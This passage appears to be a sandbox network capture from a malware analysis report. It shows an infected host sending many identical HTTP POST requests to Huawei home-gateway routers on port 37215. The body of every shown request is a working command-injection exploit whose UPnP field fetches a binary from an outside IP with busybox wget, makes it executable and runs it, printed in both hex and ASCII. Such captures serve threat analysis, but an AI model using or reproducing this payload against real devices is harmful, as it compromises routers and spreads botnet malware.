                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            956192.168.2.154606441.226.5.25237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746259928 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            957192.168.2.154492441.30.101.23337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746287107 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            958192.168.2.156013241.220.119.20437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746339083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            959192.168.2.154375841.143.247.16837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746339083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            960192.168.2.154590641.100.46.2537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746360064 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            961192.168.2.155772641.131.186.8937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746396065 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            962192.168.2.155093841.46.225.18237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746427059 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            963192.168.2.155989041.129.139.1337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746438026 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            964192.168.2.154255041.98.44.24337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746460915 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            965192.168.2.155923641.105.195.6137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746504068 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
